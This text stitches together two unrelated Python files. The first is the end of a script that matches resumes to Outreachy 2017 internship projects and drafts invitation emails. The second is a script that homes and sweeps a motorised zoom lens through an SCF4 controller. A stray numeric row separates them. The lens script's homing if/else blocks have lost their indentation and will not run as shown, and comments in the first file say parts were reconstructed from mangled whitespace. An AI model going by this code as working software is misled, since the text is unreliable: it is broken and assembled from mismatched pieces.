    edups = [item for item, count in Counter(emails).items() if count > 1]
    for email in edups:
        pdfs = [resume.pdfFileName for resume in resumeFiles if resume.emails and resume.emails[0] == email]
        print('Email duplicate:', email, ' '.join(pdfs))
    return resumeFiles
def searchForEmail(csvFile, resumeFiles):
    """Cross-reference signup emails from a CSV against the parsed resumes.

    Returns a list of (email, [pdf filenames]) tuples for every CSV row whose
    'Email' column appears verbatim in at least one resume's email list.
    """
    matches = []
    with open(csvFile, 'r') as handle:
        for row in csv.DictReader(handle, delimiter=',', quotechar='"'):
            # Exact membership test. A fuzzy comparison (fuzzywuzzy) was tried:
            # no difference at ratio > 90, and lower ratios only added false
            # positives, so plain `in` is used.
            hits = [r for r in resumeFiles if row['Email'] in r.emails]
            if not hits:
                continue
            pdf_names = {resume.pdfFileName for resume in hits}
            matches.append((row['Email'], list(pdf_names)))
    return matches
# Keyword table for the May 2017 round. Each entry pairs a project/task with:
#   keywords  — regex alternations that must ALL hit for a strong match
#   printskip — matched words to suppress when printing (last constructor arg)
# 'C(?!\+\+)' matches C but not C++ via negative lookahead.
projectsMay2017 = [
    #outreachyProject('Outreachy',
    # ['open source', 'free software', 'Linux', 'Unix', 'Solaris']),
    outreachyProject('Cadasta', 'a property rights tool',
        'enhance user settings and create a user dashboard',
        ['django'], []),
    outreachyProject('Cadasta', 'a property rights tool',
        'add new login options',
        ['django|oauth'], []),
    outreachyProject('Cadasta', 'a property rights tool',
        'improve automated test coverage',
        ['selenium'], []),
    outreachyProject('Ceph', 'a network filesystem',
        'create a root cause analysis tool for Linux distributed systems',
        ['linux', 'distributed systems'], ['linux', 'distributed systems']),
    outreachyProject('Ceph', 'a network filesystem',
        'evaluate the performance of new reweight algorithms for balancing storage utilization',
        ['statistics', 'storage', 'linux'], ['statistics', 'storage', 'linux']),
    outreachyProject('Ceph', 'a network filesystem',
        'design a status dashboard to visualize Ceph cluster statistics',
        ['python', 'linux', 'javascript', 'html5', 'css3'], []),
    outreachyProject('Ceph', 'a network filesystem',
        'identify performance degradation in nodes and automate cluster response',
        ['Linux', 'python', 'distributed systems'], []),
    outreachyProject('Ceph','a network filesystem',
        'design a simplified database backend for the Ceph Object Gateway',
        ['database', 'Linux', 'C\+\+'], ['database']),
    outreachyProject('Ceph','a network filesystem',
        'port tests written in multiple languages to test the Amazon S3 storage protocol and Openstack Swift storage',
        ['python', 'linux', 'storage'], ['storage']),
    outreachyProject('Debian', 'a Linux distribution',
        'benchmark scientific packages for general and architecture specific builds',
        ['linux', 'gcc'], ['linux']),
    outreachyProject('Debian', 'a Linux distribution',
        'improve the Debian test database and website',
        ['linux', 'python', 'sql', 'shell|bash|command-line'], ['linux', 'command-line']),
    outreachyProject('Debian', 'a Linux distribution',
        'enhance the Debian test website',
        ['html', 'css', 'linux', 'graphic'], ['linux', 'graphic']),
    outreachyProject('Debian', 'a Linux distribution',
        'Add secure mail server support to FreedomBox (a web server for small machines)',
        ['python', 'django', 'shell|bash|command-line'], ['command-line']),
    outreachyProject('Discourse', 'chat forum software',
        'enhance their forum and chat web services',
        ['rails', 'javascript|ember.js'], []),
    outreachyProject('Fedora', 'a Linux distribution',
        'create a coloring book to explain technical concepts',
        ['inkscape|scribus|storyboard|storyboarding|graphic design'], ['graphic design', 'storyboard', 'storyboarding']),
    outreachyProject('Fedora', 'a Linux distribution',
        'improve Bodhi, the web-system that publishes updates for Fedora',
        ['python', 'javascript|html|css|linux|fedora'], []),
    outreachyProject('GNOME', None,
        'improve the recipes or maps applications',
        ['gtk'], []),
    outreachyProject('Lagome', 'a microservices platform',
        "create an online auction sample app to showcase Lagome's microservices",
        ['java', 'scala|react|reactive'], ['react', 'reactive']),
    outreachyProject('Linux kernel', None,
        'analyze memory resource release operators and fix Linux kernel memory bugs',
        ['linux', 'operating systems', 'memory'], ['linux', 'operating systems', 'memory']),
    outreachyProject('Linux kernel', None,
        'improve process ID allocation',
        ['linux', 'operating systems', 'kernel'], ['linux', 'operating systems', 'kernel']),
    outreachyProject('Linux kernel', None,
        'improve nftables (an in-kernel network filtration tool)',
        ['linux', 'operating systems', 'networking'], ['linux', 'operating systems', 'networking']),
    outreachyProject('Linux kernel', None,
        'write a driver for a sensor using the Industrial I/O interface',
        ['linux', 'operating systems|robotics|embedded', 'C\+\+|C(?!\+\+)'],
        ['linux', 'operating systems', 'robotics', 'embedded', 'c++']),
    outreachyProject('Linux kernel', None,
        'improve documentation build system and translate docs into ReStructured Text format',
        ['perl', 'python', 'operating systems'], ['operating systems']),
    outreachyProject('Mozilla', None,
        None,
        ['mozilla|firefox'], ['mozilla', 'firefox']),
    outreachyProject('OpenStack', 'software for cloud deployment and management',
        'add continuous integration for OpenStack Identity Service (keystone) LDAP support',
        ['python', 'shell|bash|command-line'], ['command-line']),
    outreachyProject('oVirt', 'virtualization management software',
        'implement oVirt integration tests using Lago and the oVirt REST API',
        ['python', 'rest'], ['rest']),
    outreachyProject('oVirt', 'virtualization management software',
        'design an oVirt log analyzer for distributed systems',
        ['python', 'linux', 'distributed systems'], ['distributed systems']),
    outreachyProject('oVirt', 'virtualization management software',
        'rewrite oVirt UI dialogs in modern JavaScript technologies',
        ['es6|react|redux'], []),
    outreachyProject('QEMU', 'hardware virtualization software',
        'rework the QEMU audio backend',
        ['C(?!\+\+)', 'audio'], ['audio']),
    outreachyProject('QEMU', 'hardware virtualization software',
        'create a full and incremental disk backup tool',
        ['C(?!\+\+)', 'python', 'storage'], ['storage']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "refactor the block layer's I/O throttling and write notifiers",
        ['C(?!\+\+)', 'storage'], ['storage']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "code an emulated PCIe-to-PCI bridge",
        ['pci|pcie'], ['pci', 'pcie']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "add x86 virtualization support on macOS using Hypervisor.framework",
        ['C(?!\+\+)', 'mac', 'virtualization'], ['mac', 'virtualization']),
    outreachyProject('QEMU', 'hardware virtualization software',
        "extend the current vhost-pci based inter-VM communication",
        ['C(?!\+\+)', 'pci'], ['pci']),
    outreachyProject('Sugar Labs', 'a software-development and learning community',
        'improve Music Blocks, an application for exploring fundamental musical concepts',
        ['javascript|JS', 'music'], ['music']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'write a Zotero translator and document the process',
        ['javascript', 'documentation'], ['documentation']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'improve and fix bugs in the quiz extension',
        ['php', 'documentation'], ['documentation']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'create user guides to help with translation outreach',
        ['translation|localization'], ['translation', 'localization']),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'implement automatic edits on wikis connected to the Programs & Events Dashboard',
        ['rails'], []),
    outreachyProject('Wikimedia', 'a non-profit known for Wikipedia',
        'implement an automatic article feedback feature for the Programs & Events Dashboard',
        ['rails'], []),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'implement a resource editor and dialog editor',
        ['C(?!\+\+)', 'Windows', 'UI|UX'], ['windows', 'ui', 'ux']),
    outreachyProject('Wine', 'a tool to run Windows programs on Linux or BSD',
        'implement missing D3DX9 APIs',
        ['C(?!\+\+)', 'computer graphics'], []),
    outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
        'implement Direct3D microbenchmarks',
        ['C(?!\+\+)', 'opengl'], []),
    outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
        'create automated game benchmarks',
        ['C(?!\+\+)', 'game engine'], ['game engine']),
    outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
        'port WineLib to a new architecture (such as PPC64, Sparc64, RISC-V, or x32)',
        ['PPC|PowerPC|Sparc|Sparc64|RISC-V'], ['ppc', 'powerpc', 'sparc', 'sparc64', 'risc-v']),
    outreachyProject('Wine','a tool to run Windows programs on Linux or BSD',
        'improve the AppDB website, which lists Wine support for Windows programs',
        ['php', 'html', 'mysql'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'create golang bindings for libxl on the Xen hypervisor',
        ['go', 'C(?!\+\+)'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'create rust bindings for libxl on the Xen hypervisor',
        ['rust'], ['rust']),
    outreachyProject('Xen Project', 'a virtualization platform',
        'enhance the KDD (Windows Debugger Stub) for the Xen hypervisor',
        ['C(?!\+\+)', 'windows', 'kernel|debugger'], ['windows', 'debugger']),
    outreachyProject('Xen Project', 'a virtualization platform',
        'fuzz test the Xen hypercall interface',
        ['C(?!\+\+)', 'assembly', 'gcc'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'improve Mirage OS, a unikernel that runs on top of Xen',
        ['ocaml'], []),
    outreachyProject('Xen Project', 'a virtualization platform',
        'create a Xen code review dashboard',
        ['sql', 'javascript', 'html5', 'java'], []),
    #outreachyProject('Xen Project', 'a virtualization platform',
    # 'implement tools for code standards checking using clang-format',
    # ['clang']),
    outreachyProject('Xen Project', 'a virtualization platform',
        'add more FreeBSD testing to osstest',
        ['freebsd|bsd|openbsd|netbsd|dragonfly'], ['freebsd', 'bsd', 'openbsd', 'netbsd', 'dragonfly']),
    outreachyProject('Yocto', 'a tool for creating embedded Linux distributions',
        'improve and document the Yocto autobuilder',
        ['C(?!\+\+)', 'python', 'distro|linux|yocto|openembedded', 'embedded|robotics|beaglebone|beagle bone|minnow|minnowboard|arduino'], ['distro', 'linux', 'yocto', 'embedded', 'robotics', 'beaglebone', 'beagle bone', 'minnow', 'minnowboard', 'arduino']),
]
# We have two types of resumes:
# 1. They matched *some* but not all of the important keywords for a project.
# 2. They matched *all* of the keywords we need.
def matchResumes(resumeFiles):
    """Tag each resume with the projects it matches.

    A *strong* match hits every keyword group of a project; a *weak*
    match hits at least one group but not all of them.  Results are
    appended to the resume and project match lists in place.
    """
    for resume in resumeFiles:
        for project in projectsMay2017:
            # One hit-set per keyword group; a group counts as matched
            # when its set is non-empty.
            hit_sets = []
            for keyword in project.keywords:
                pattern = r'\b(?:' + keyword + r')\b'
                hit_sets.append(set(re.findall(pattern, resume.contents, flags=re.IGNORECASE)))
            # Union of all matched words, deduplicated across groups.
            matched_words = set.union(*hit_sets)
            if all(hit_sets):
                resume.strongProjectMatches.append((project, matched_words))
                project.strongResumeMatches.append(resume)
            elif any(hit_sets):
                resume.weakProjectMatches.append((project, matched_words))
                project.weakResumeMatches.append(resume)
def matchWithProjects(resumeFiles):
    """Populate project-match lists on every resume in *resumeFiles*.

    Thin wrapper around matchResumes().  The previous ``goldresumes``
    local was assigned and never used, and a large block of
    commented-out match-count diagnostics has been removed; both were
    dead code.
    """
    matchResumes(resumeFiles)
# Email boilerplate stitched together by craftEmail()/craftGenericEmail():
# headers, a greeting paragraph (booth / no-booth variants), the program
# descriptions, and the sign-off.
# Bug fix: both greetings read "two programs programs" (duplicated word).
header1 = '''From: Sarah Sharp <saharabeara@gmail.com>
'''
header3 = '''Reply-to: outreachy-admins@gnome.org
Subject: Internship opportunities
'''
# Greeting for people we did not meet at the booth.
noBooth = '''Greetings!
I'm Sarah Sharp, and we both attended the Tapia conference last
September. I'd like to invite you to apply to two programs
that provide paid internships in open source. Interns will work
remotely with experienced mentors.
'''
# offer to host Outreachy session if they signed up at the booth or mention open
# source in their resume?
# What about the students at universities hosting introductory sessions?
atBooth = '''Greetings!
I'm Sarah Sharp, and we met when you stopped by the Outreachy booth
at the Tapia conference last September. I'd like to invite you to
apply to two programs that provide paid internships.
Interns will work remotely with experienced mentors.
'''
generalInfo = '''Google Summer of Code is open to all university students:
https://developers.google.com/open-source/gsoc/
Outreachy is open internationally to women (both cis & trans),
trans men, and genderqueer folks. It is also open to U.S. residents
and nationals of any gender who are Black/African American,
Hispanic/Latin@, American Indian, Alaska Native, Native Hawaiian, or
Pacific Islander.
https://wiki.gnome.org/Outreachy/
Both programs offer internships from May 30 to August 30.
Google Summer of Code application process runs from Feb 28 to Apr 3,
while Outreachy's application process runs from Feb 16 to Mar 30.
Google Summer of Code application only requires a project proposal.
Outreachy also requires applicants to make project contributions.
'''
moreInfo = '''The full list of Outreachy internship projects is available at:
https://wiki.gnome.org/Outreachy/2017/MayAugust
Please let me know if you have any questions about the Outreachy
program. Outreachy coordinators (Marina, Karen, Cindy, Tony, and I)
can all be reached at outreachy-admins@gnome.org You can contact all
organization mentors by emailing outreachy-list@gnome.org
I hope you'll apply!
Thanks,
Sarah Sharp
'''
# TODO:
# 1. Remove the generic description when we have a good resume match; it's more personal.
LINEWRAP = 68  # wrap column for outgoing email paragraphs
def writeInitialInvitation(emaildir, resume, boothlist, matches):
    """Build the opening paragraph inviting *resume* to its best match.

    ``matches`` is a list of (project, matched-keyword-set) tuples; only
    the first entry is used here.  If the project has no description the
    paragraph is finished: it is wrapped and returned with a trailing
    blank line.  Otherwise the *unwrapped* partial paragraph is returned
    for the caller to extend and wrap itself.
    """
    project, keywords = matches[0]
    # NOTE(review): "a good fit for in an internship" reads like a typo in
    # the outgoing text -- confirm intended wording before changing it.
    para = ("Based on your resume, if you're eligible for Outreachy, it looks like you might be a good fit for in an internship with " +
            project.name)
    if project.short:
        para = para + ' (' + project.short + ')'
    if not project.description:
        # Nothing more to add: terminate, wrap, and return the paragraph.
        return textwrap.fill(para + '.', LINEWRAP, replace_whitespace=False) + '\n\n'
    para = para + ' which is offering an internship to ' + project.description
    # Drop keywords the project asked us not to print back to applicants.
    keywords = [k for k in keywords if k.lower() not in project.printskip]
    if keywords:
        para = para + ' that involves working with '
        k = list(set(keywords))
        # English-list join: "a", "a and b", or "a, b and c".
        if len(k) == 1:
            para = para + k[0]
        elif len(k) == 2:
            para = para + ' and '.join(k)
        else:
            para = para + ', '.join(k[:-1]) + ' and ' + k[-1]
    return para
def writeStrongInvitation(emaildir, resume, boothlist):
    """Build the full invitation paragraph for a strongly-matched resume.

    Matches are sorted by how few keywords they matched, the first one is
    described by writeInitialInvitation(), and any further matches are
    appended as extra internship descriptions.  Returns the wrapped
    paragraph ending in a blank line.

    Fix: removed the unused ``descriptions = []`` local.
    """
    matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1]))
    project, keywords = matches[0]
    para = writeInitialInvitation(emaildir, resume, boothlist, matches)
    if len(resume.strongProjectMatches) > 1:
        # NOTE(review): this re-uses the *first* match's project name; the
        # caller only sends strong invitations when all matches are with
        # the same organization, so this is apparently intentional.
        para = (para + '. You may also be interested in the ' +
                project.name + ' internship')
        if len(resume.strongProjectMatches) > 2:
            para = para + 's to '
        else:
            para = para + ' to '
        for project, keywords in matches[1:-1]:
            para = para + project.description + ' or the internship to '
        para = para + matches[-1][0].description
    return textwrap.fill(para + '.', LINEWRAP) + '\n\n'
def writeMultipleStrongInvitation(emaildir, resume, boothlist):
    """Build the invitation paragraph for a resume matching several orgs.

    Like writeStrongInvitation() but groups the remaining matches by
    project name so each organization is only described once.

    NOTE(review): indentation below reconstructed from a whitespace-
    mangled source; the grouping/description logic looks partially
    duplicated and should be re-verified against the original file.
    """
    matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1]))
    project, keywords = matches[0]
    para = writeInitialInvitation(emaildir, resume, boothlist, matches)
    doneProjects = set()
    for project, keywords in matches[1:]:
        # All not-yet-handled matches that share this project's name.
        projmatches = [(p, k) for p, k in matches[1:]
                       if p not in doneProjects and
                       p.name == project.name
                       ]
        if not projmatches:
            continue
        doneProjects.add(project)
        for p, k in projmatches:
            para = (para + '. You may also be interested in the ' +
                    p.name + ' internship')
            if not p.description:
                # No description available: stop extending this sentence.
                break
        if len(projmatches) > 2:
            para = para + 's to '
        else:
            para = para + ' to '
        descriptions = []
        for p2, k2 in projmatches[1:-1]:
            para = para + p2.description + ' or the internship to '
        para = para + projmatches[-1][0].description
    return textwrap.fill(para + '.', LINEWRAP) + '\n\n'
class emailType(Enum):
    """Match confidence for a resume; selects which email body is built."""
    strong = 1  # all keyword groups matched (single organization)
    mixed = 2   # strong matches spread across multiple organizations
    weak = 3    # only partial keyword matches
def craftEmail(emaildir, resume, boothlist, strength):
    """Assemble one invitation email for *resume* and write it to *emaildir*.

    The greeting depends on whether we met the person at the booth, and
    the body on the match ``strength``.  Output file is named after the
    resume's text file with an '-email.txt' suffix.
    """
    email = header1 + 'To: ' + ', '.join(resume.emails) + '\n' + header3
    if resume.pdfFileName in boothlist:
        email = email + atBooth
    else:
        email = email + noBooth
    if strength is emailType.strong:
        email = (email + generalInfo +
                 writeStrongInvitation(emaildir, resume, boothlist) +
                 moreInfo)
    elif strength is emailType.mixed:
        email = (email + generalInfo +
                 writeMultipleStrongInvitation(emaildir, resume, boothlist) +
                 moreInfo)
    # NOTE(review): emailType.weak falls through with only the greeting --
    # confirm that is intentional.
    ext = '-email.txt'
    with open(os.path.join(emaildir, os.path.splitext(resume.textFileName)[0] + ext), 'w') as f:
        f.write(email)
def createFormEmails(directory, resumeFiles, boothlist):
    """Write invitation emails for all strongly-matched resumes.

    Resumes whose strong matches are all with one organization get an
    email in a per-project 'emails-<org>' subdirectory; resumes matching
    multiple organizations go into a 'mixed' subdirectory.  The matched
    pdf resume is copied alongside each generated email.

    Fixes: the two bare ``except:`` clauses are narrowed to ``OSError``
    (only filesystem errors mean "pdf missing"), and a redundant
    per-keyword loop duplicating ``allkeywords.update(keywords)`` was
    removed.
    """
    # For all resumes with one strong match or multiple strong matches with the same organization:
    # Create a directory with the organization name (lowercase, with spaces replaced with dashes)
    # Copy pdf resume into that directory, create basename-email.txt
    oneStrong = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == 1]
    print('Resumes with exactly one match:', len(oneStrong))
    left = [resume for resume in resumeFiles if resume not in oneStrong]
    for resume in left:
        if not resume.strongProjectMatches:
            continue
        # If every strong match shares the first match's org name, treat
        # the resume like a single-org match.
        firstMatch = resume.strongProjectMatches[0][0].name
        for match in resume.strongProjectMatches[1:]:
            if match[0].name != firstMatch:
                firstMatch = ''
                break
        if firstMatch:
            oneStrong.append(resume)
    left = [resume for resume in resumeFiles if resume not in oneStrong]
    print('Resumes with exactly one match or multiple matches with same org:', len(oneStrong))
    print('Other resumes:', len(left))
    for project in projectsMay2017:
        matches = [resume for resume in oneStrong if resume.strongProjectMatches[0][0].name == project.name]
        if not matches:
            continue
        dirpath = os.path.join(directory, 'emails-' + re.sub(r'\s+', '-', project.name.lower()))
        if not os.path.exists(dirpath):
            os.makedirs(dirpath)
        for resume in matches:
            try:
                if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)):
                    copyfile(os.path.join(directory, resume.pdfFileName),
                             os.path.join(dirpath, resume.pdfFileName))
            except OSError:
                print('Could not find pdf file for', resume.textFileName)
                continue
            craftEmail(dirpath, resume, boothlist, emailType.strong)
    # For all resumes with strong matches with multiple orgs (but less than 4 orgs):
    # Create a directory called strong-mixed.
    # Copy pdf resume into that directory, create basename-email.txt
    #
    # "Based on your resume, it looks like you might be interested in an
    # internship with $PROJECT that involves $KEYWORDS which is offering an internship for
    # $DESCRIPTION.
    #
    # Additionally, you might be interested in $PROJECT that involves $KEYWORDS which
    # is offering an internship for $DESCRIPTION."
    mixed = [resume for resume in resumeFiles if resume not in oneStrong and resume.strongProjectMatches]
    dirpath = os.path.join(directory, 'mixed')
    if not os.path.exists(dirpath):
        os.makedirs(dirpath)
    for resume in mixed:
        try:
            if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)):
                copyfile(os.path.join(directory, resume.pdfFileName),
                         os.path.join(dirpath, resume.pdfFileName))
        except OSError:
            print('Could not find pdf file for', resume.textFileName)
            continue
        craftEmail(dirpath, resume, boothlist, emailType.mixed)
    # For all resumes with strong matches with 4 or more orgs:
    # Create a directory called strong-scattered.
    # Copy pdf resume into that directory, create basename-email.txt
    # For all weakly matched resumes - figure out top keywords that matched weak resumes.
    hitcount = Counter()
    for resume in [resume for resume in resumeFiles if not resume.strongProjectMatches]:
        allkeywords = set()
        for project, keywords in resume.weakProjectMatches:
            allkeywords.update(keywords)
        hitcount.update(allkeywords)
    # NOTE(review): hitcount is computed but not yet used -- future work:
    # Take the top N keywords that weakly matched, find all projects that matched those keywords.
    # "Based on your resume, it looks like you might be interested in Outreachy
    # projects involving $KEYWORD like $MATCHES"
def craftGenericEmail(emaildir, resume):
    """Write a generic (no project match) invitation email for *resume*."""
    # First known address, or blank when the resume had none.
    address = resume.emails[0] if resume.emails else ''
    body = header1 + 'To: ' + address + '\n' + header3
    body = body + noBooth
    body = body + generalInfo + moreInfo
    target = os.path.join(emaildir,
                          os.path.splitext(resume.textFileName)[0] + '-email.txt')
    with open(target, 'w') as out:
        out.write(body)
def main():
    """CLI entry point: match .txt resumes against projects and emit emails.

    Fixes: ``doneResumes``/``notusResumes`` are now initialised so later
    references don't raise NameError when --done/--notus are omitted, and
    the final call passes createFormEmails() its three real arguments
    (the old call passed an undefined name ``generic`` as a fourth).
    """
    parser = argparse.ArgumentParser(description='Search text resume files for skillset matches.')
    parser.add_argument('dir', help='Directory with .txt resume files')
    parser.add_argument('--csv', help='CSV file with name <email>,matching resume file of people who stopped by the booth')
    parser.add_argument('--notus', help='Directory with .txt resumes files that may be non-U.S. residents')
    parser.add_argument('--done', help='Directory with .txt resume files that have been contacted')
    parser.add_argument('--generic', help='Simply create generic emails and ignore project matches', default=False)
    #parser.add_argument('matches', help='file to write potential matches to')
    args = parser.parse_args()
    resumeFiles = readResumeFiles(args.dir)
    # Default to empty so the booth/done bookkeeping below works even when
    # the optional directories were not supplied.
    doneResumes = []
    notusResumes = []
    # Check to see if we have resumes to process that we've already
    # sent email to.
    if args.done:
        doneResumes = readResumeFiles(args.done)
        emails = [resume.emails[0] for resume in doneResumes if resume.emails]
        for email in emails:
            pdfs = [resume.pdfFileName for resume in resumeFiles if resume.emails and resume.emails[0] == email]
            matches = [resume.pdfFileName for resume in doneResumes if resume.emails and resume.emails[0] == email]
            if pdfs:
                print('Already contacted:', email, ' '.join(pdfs), 'matches done resume', ' '.join(matches))
    if args.notus:
        notusResumes = readResumeFiles(args.notus)
    if args.generic:
        # Generic mode: one template email per resume, no matching.
        genericdir = os.path.join(args.dir, 'generic-todo')
        if not os.path.exists(genericdir):
            os.makedirs(genericdir)
        for resume in resumeFiles:
            craftGenericEmail(genericdir, resume)
        return
    boothstops = (searchForEmail(args.csv, resumeFiles) +
                  searchForEmail(args.csv, doneResumes) +
                  searchForEmail(args.csv, notusResumes))
    boothlist = set()
    for email, filelist in boothstops:
        boothlist.update(filelist)
    print('Booth stop list', boothstops)
    print('Booth stop pdfs', boothlist)
    print('Done resumes', [resume.pdfFileName for resume in doneResumes])
    matchWithProjects(resumeFiles)
    boothandresume = len([resume for resume in resumeFiles
                          if resume.pdfFileName in boothlist
                          and len(resume.strongProjectMatches)])
    print('People who stopped by the booth who have a resume and need an email:', boothandresume)
    print('People who stopped by the booth who have a resume and have been sent email:',
          len([resume for resume in doneResumes
               if resume.pdfFileName in boothlist]))
    print('People who stopped by the booth who have a resume and may be non-U.S. citizens:',
          len([resume for resume in notusResumes
               if resume.pdfFileName in boothlist]))
    createFormEmails(args.dir, resumeFiles, boothlist)
if __name__ == "__main__":
    main()
| 31,892 | 9,044 |
import cv2
import os
import serial
import sys
import scf4_tools
import time
import threading
import camera
import numpy as np
from scipy.interpolate import interp1d
from tqdm import tqdm
# Indices into the status word returned by scf4_tools.parse_status().
# NOTE(review): "PI" presumably = photo-interrupter end-stop sensor,
# "MOVE" = axis-moving flag -- confirm against scf4_tools.
CHB_MOVE = 7
CHA_MOVE = 6
CHB_PI = 4
CHA_PI = 3
def parse_data(data):
    """Split an iterable of 'X Y' lines into two parallel integer lists.

    Returns (xs, ys) where xs holds the first field of each line and ys
    the second, both converted with int().
    """
    xs = []
    ys = []
    for line in data:
        fields = line.split(" ")
        xs.append(int(fields[0]))
        ys.append(int(fields[1]))
    return xs, ys
def scale(val, src, dst):
    """Linearly map *val* from range ``src=(lo, hi)`` onto range ``dst``."""
    src_lo, src_hi = src
    dst_lo, dst_hi = dst
    fraction = (val - src_lo) / (src_hi - src_lo)
    return fraction * (dst_hi - dst_lo) + dst_lo
# --- Serial link to the SCF4 lens controller --------------------------------
ser = serial.Serial()
ser.port = 'COM231'  # Controller com port
ser.baudrate = 115200  # BAUD rate when connected over CDC USB is not important
ser.timeout = 5  # max timeout to wait for command response
print("Open COM port:", ser.port)
ser.open()
ser.flushInput()
ser.flushOutput()
# --- Camera preview (runs in its own thread inside camera.Cam) --------------
c = camera.Cam()
print("Starting cam")
c.start()
print("Waiting for camera")
while c.fps == 0:
    time.sleep(0.1)  # should be implemented with queue/signals but good enough for testing
print("Cam is operational")
c.set_cam_text("Prepare")
# --- Controller initialisation: G-code-style commands over serial -----------
print("Read controller version strings")
scf4_tools.send_command(ser, "$S", echo=True)
print("Initialize controller")
scf4_tools.send_command(ser, "$B2", echo=True)
print("# Set motion to forced mode")
scf4_tools.send_command(ser, "M231 A", echo=True)
print("Set stepping mode")
scf4_tools.send_command(ser, "M243 C6", echo=True)
print("Set normal move")
scf4_tools.send_command(ser, 'M230', echo=True)
print("Set to rel movement mode")
scf4_tools.send_command(ser, 'G91', echo=True)
print("Energize PI leds")
scf4_tools.send_command(ser, "M238", echo=True)
print("Set motor power")
scf4_tools.send_command(ser, "M234 A190 B190 C190 D90", echo=True)
print("Set motor sleep power")
scf4_tools.send_command(ser, "M235 A120 B120 C120", echo=True)
print("Set motor drive speed")
scf4_tools.send_command(ser, "M240 A600 B600 C600", echo=True)
print("Set PI low/high detection voltage")
scf4_tools.send_command(ser, "M232 A400 B400 C400 E700 F700 G700", echo=True)
print("Filter = VIS")
scf4_tools.send_command(ser, "M7", echo=True)
c.set_cam_text("Homing A")
print()
print("Home axis A")
print("Get status")
status_str = scf4_tools.send_command(ser, "!1")
status = scf4_tools.parse_status(status_str)
print(status_str)
if status[3] == 0:
print("Dir 1")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A+100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI)
else:
print("Dir 2")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A-100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) # Wait until homing is over
print("Motor normal mode")
scf4_tools.send_command(ser, "M230 A") # Set motion back to normal mode
scf4_tools.send_command(ser, "G0 A-200")
scf4_tools.wait_homing(ser, 1, CHA_MOVE) # Wait until homing is over
print("Motor forced mode")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A+100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) # Wait until homing is over
print("Set current coordinate as middle")
scf4_tools.send_command(ser, "G92 A32000") # set current coordinate to 32000
scf4_tools.send_command(ser, "M230 A") # Set motion back to normal mode
scf4_tools.send_command(ser, "G90")
c.set_cam_text("Homing B")
print()
print("Home axis B")
print("Get status")
status_str = scf4_tools.send_command(ser, "!1")
status = scf4_tools.parse_status(status_str)
print(status_str)
if status[4] == 0:
print("Dir 1")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B+100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI)
else:
print("Dir 2")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B-100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) # Wait until homing is over
print("Motor normal mode")
scf4_tools.send_command(ser, "M230 B") # Set motion back to normal mode
scf4_tools.send_command(ser, "G0 B-200")
scf4_tools.wait_homing(ser, 1, CHB_MOVE) # Wait until homing is over
print("Motor forced mode")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B+100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) # Wait until homing is over
print("Set current coordinate as middle")
scf4_tools.send_command(ser, "G92 B32000") # set current coordinate to 32000
scf4_tools.send_command(ser, "M230 B") # Set motion back to normal mode
scf4_tools.send_command(ser, "G90")
# Load calibrated (zoom A, focus B) coordinate pairs and build a cubic
# interpolation of focus position versus zoom position, then sweep the
# lens from wide to narrow while updating the on-screen focal length.
# Fixes: removed a duplicated parse_data() call, the unused `xi` local,
# and a redundant f.close() after the `with` block had already closed
# the file.
with open('line_inf2.txt') as f:
    lines = f.readlines()
x, y = parse_data(lines)
yi = interp1d(x, y, kind='cubic')
new_list2 = []
for i in range(min(x), max(x), 10):
    y = float(np.asarray(yi(i)))
    new_list2.append((i, y))
# reverse motion direction (from wide to narrow)
new_list2 = new_list2[::-1]
print("Set motor drive speed")
scf4_tools.send_command(ser, "M240 A500 B500 C500", echo=True)
c.set_cam_text("Moving to wide angle")
(x, y) = new_list2[0]
scf4_tools.send_command(ser, "G0 A"+str(x))
scf4_tools.wait_homing(ser, 1, CHA_MOVE)  # Wait until the move is over
scf4_tools.send_command(ser, "G0 B"+str(y))
scf4_tools.wait_homing(ser, 1, CHB_MOVE)  # Wait until the move is over
print("Done")
time.sleep(1)
for i in tqdm(range(len(new_list2))):
    (x, y) = new_list2[i]
    # Map the A-axis step position onto an approximate focal length in mm.
    zoom = round(scale(x, (39800, 22600), (5.5, 95)), 1)
    c.set_cam_text("Focal length: "+str(zoom)+"mm")
    scf4_tools.send_command(ser, "G0 A"+str(x)+" B"+str(y))
    time.sleep(0.001)
c.set_cam_text("Sleeping 10s")
time.sleep(10)
time.sleep(10)
c.stop()
| 6,292 | 2,671 |
